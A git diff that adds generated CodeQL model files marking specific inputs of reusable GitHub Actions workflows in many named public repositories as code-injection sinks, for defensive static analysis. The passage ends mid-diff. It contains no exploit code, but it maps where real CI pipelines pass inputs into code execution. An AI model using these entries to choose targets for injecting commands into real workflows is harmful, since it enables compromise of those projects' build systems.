a/actions/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml new file mode 100644 index 000000000000..59f7022fd895 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] + - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml new file mode 100644 index 000000000000..f2e55b0dc5e3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_START", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "input.xml_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "input.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.cmake_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.CTEST_CONFIGURATION_TYPE", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.arch", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.DISTR", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml new file mode 100644 index 000000000000..f92cfbba9c59 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml new file mode 100644 index 000000000000..09318cf02bb7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-colors-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.build-configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml new file mode 100644 index 000000000000..48a3258e7a8a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] + - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "input.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml new file mode 100644 index 000000000000..cc8afde9d6a1 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml new file mode 100644 index 000000000000..2960e471d2e3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.drivername", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/mmctl-test-template.yml", "*", "input.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/esrupgrade-common.yml", "*", "input.db-dump-url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml new file mode 100644 index 000000000000..a4f095a23592 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml new file mode 100644 index 000000000000..cba130336692 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.sm_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.expected_resources_namespaces", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.expected_resources_types", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.expected_resources", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.patternfile_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.service_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.deployment_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.provider", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adapters.yaml", "*", "input.adapter_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml new file mode 100644 index 000000000000..3fa02372683c --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_s3.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_c3.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32.yml", "*", "input.board", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml new file mode 100644 index 000000000000..d31c7ee78044 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml new file mode 100644 index 000000000000..a270324f866d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml new file mode 100644 index 000000000000..58dc1dd30af3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "input.ARTIFACT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-memorypipeline.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "input.ARTIFACT_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml new file mode 100644 index 000000000000..7255b0fa879a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.config", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.plat", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.static", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.config", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.codecheck", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.systemcrypto", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.plat", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml new file mode 100644 index 000000000000..b2aacde75df2 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml new file mode 100644 index 000000000000..4bc1aec46a25 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml new file mode 100644 index 000000000000..1309dc357a2d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraInitWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.reactNativeWindowsVersion", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.sampleName", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "input.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "input.sampleName", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml new file mode 100644 index 000000000000..a76e015ab89a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml new file mode 100644 index 000000000000..b9da0f85225b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.includes", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.tags", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.kinds", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.pkgs", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml new file mode 100644 index 000000000000..99e2d783c66b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] + - ["moby/moby/.github/workflows/.windows.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml new file mode 100644 index 000000000000..cef0c9134aa7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.tags", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.image-name", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.image-uuid", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.staging-repo", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.staging", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml new file mode 100644 index 000000000000..6c9f45dbad01 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] + - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml new file mode 100644 index 000000000000..40856fa46b38 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] + - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml new file mode 100644 index 000000000000..807229fc6b5e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.arch", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.amazonflag", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml new file mode 100644 index 000000000000..df2220211b94 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml new file mode 100644 index 000000000000..7faea6b07ef1 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml new file mode 100644 index 000000000000..43018d43110d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.fprime_location", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "input.default_target_ref", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "input.target_repository", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml new file mode 100644 index 000000000000..eaf9a48f30fb --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml new file mode 100644 index 000000000000..b50566bcad6a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.string_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.number_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.number_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.bool_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.bool_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.string_optional", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml new file mode 100644 index 000000000000..8bd7e837d38a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"] + - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml new file mode 100644 index 000000000000..7b76f842451e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml new file mode 100644 index 000000000000..ee4636c6a2d7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.non_validator_mode", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.additional_optimism_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.network", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.additional_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.cl_client", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml new file mode 100644 index 000000000000..5f1f9ea13ad3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "input.test_mode", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/multiverse_run.yml", "*", "input.agentVersion", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "input.dry-run", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "input.prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml new file mode 100644 index 000000000000..d2188efb8ee6 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] + - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "input.agent-ref", "code-injection", "generated"] \ No newline at end of file diff --git 